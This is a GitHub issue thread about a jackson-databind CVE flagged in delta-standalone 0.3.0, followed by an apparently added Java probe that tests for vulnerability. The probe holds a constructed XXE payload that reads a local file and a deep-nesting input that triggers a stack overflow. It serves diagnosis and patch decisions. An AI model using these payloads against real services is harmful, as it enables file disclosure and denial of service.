delta-io/connectors

Latest delta-standalone version 0.3.0 has security risk CWE-611

zhudaxi opened this issue · 4 comments

In the latest delta-standalone version 0.3.0 jar, shadedelta/com/fasterxml/jackson/databind/ext/DOMSerializer is risky for CWE-611.

This may be due to jackson-databind version 2.10.0 having CVE-2020-25649. If upgraded to the latest version, this issue might be fixed.

@zhudaxi Thanks for reporting this. Since Delta Standalone doesn't use Jackson to process XML, it should not be affected. Please let us know if we misunderstand the CVE.

@zsxwing Thanks for following up. I think this issue is the same as what is reported in the jackson-databind project issue. The Delta Standalone project is not using Jackson to process XML, but our scanning tool reports the risk. It seems not fixed yet on the jackson-databind side as of now.

Thanks! I'm going to close this as it doesn't affect Delta Standalone.

@zsxwing Can we reopen this issue so that once this jackson-databind side issue is fixed, the delta-standalone project can upgrade to adopt the fix?
Also, jackson-databind has another security issue, CVE-2020-36518. Do you want to upgrade the version for delta-standalone?
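The two CVEs raised in this thread have very different trigger conditions, which is what the maintainer's "doesn't use Jackson to process XML" argument rests on. CVE-2020-25649 lives in `DOMDeserializer`, and that class is only reached when a caller asks `ObjectMapper` to deserialize a JSON string into an `org.w3c.dom.Node` or `Document`; the same JSON string read into `String` never touches an XML parser. CVE-2020-36518 is unrelated to XML: a sufficiently deep nesting of arrays or objects makes the untyped deserializer recurse until the JVM throws `StackOverflowError`. The following probe is an added example written for this page, not code from delta-standalone or jackson-databind. It assumes an unshaded jackson-databind on the classpath; to run it against the shaded jar from L7 you would change the imports to the relocated `shadedelta.com.fasterxml...` prefix. The XML payload and the depth of 100000 are constructed test inputs, and the file path read by the external entity is a harmless local file chosen only to show whether expansion happens.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import org.w3c.dom.Document;

// Added probe for the two jackson-databind CVEs discussed in the issue.
// Not part of delta-standalone; the payloads below are constructed.
public class JacksonCveProbe {

    // Constructed CVE-2020-25649 payload: XML with an external entity that
    // points at a local file. It is only dangerous if the target type is a DOM
    // type, because that is the only way into DOMDeserializer.
    static final String XXE_XML =
        "<!DOCTYPE r [<!ENTITY ext SYSTEM \"file:///etc/hostname\">]><r>&ext;</r>";

    /**
     * Deserialize the XML, wrapped as a JSON string literal, into a DOM Document.
     * Vulnerable versions (before the 2.9.10.7 / 2.10.5.1 fixes) expand the entity
     * and return the file contents; fixed versions refuse the DOCTYPE or leave the
     * entity unexpanded.
     */
    public static String probeXxe(ObjectMapper mapper) throws Exception {
        String json = mapper.writeValueAsString(XXE_XML); // "<!DOCTYPE r [...]>..." as JSON
        try {
            Document doc = mapper.readValue(json, Document.class); // -> DOMDeserializer
            String text = doc.getDocumentElement().getTextContent();
            return text.isEmpty() ? "not-expanded" : "resolved: " + text.trim();
        } catch (Exception e) {
            return "blocked: " + e.getClass().getSimpleName();
        }
    }

    /** Same JSON read into String: no XML parser is involved, on any version. */
    public static String readAsString(ObjectMapper mapper) throws Exception {
        return mapper.readValue(mapper.writeValueAsString(XXE_XML), String.class);
    }

    /**
     * Constructed CVE-2020-36518 payload: `depth` nested arrays deserialized as
     * untyped Object. Vulnerable versions recurse once per level and die with
     * StackOverflowError; later versions either iterate or reject the depth
     * with a checked exception.
     */
    public static String probeNesting(ObjectMapper mapper, int depth) {
        StringBuilder sb = new StringBuilder(depth * 2);
        for (int i = 0; i < depth; i++) sb.append('[');
        for (int i = 0; i < depth; i++) sb.append(']');
        try {
            mapper.readValue(sb.toString(), Object.class);
            return "parsed";
        } catch (StackOverflowError so) {
            return "StackOverflowError"; // the CVE-2020-36518 failure mode
        } catch (Exception e) {
            return "rejected: " + e.getClass().getSimpleName();
        }
    }

    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        System.out.println("XXE via Document: " + probeXxe(mapper));
        System.out.println("XXE via String:   " + readAsString(mapper).length()
            + " chars returned, no XML parse");
        System.out.println("Nesting 100000:   " + probeNesting(mapper, 100_000));
    }
}
```

Running `probeXxe` against the shaded jar is the direct way to confirm or refute the scanner's finding for an application that does deserialize into DOM types; for Delta Standalone's own code paths, which read JSON into its own classes rather than `org.w3c.dom` types, the first probe shows why the scanner hit is a bundled-class match rather than a reachable sink. The nesting probe, by contrast, depends only on the input that reaches `ObjectMapper`, so it is the one worth considering when deciding whether to bump the bundled jackson-databind.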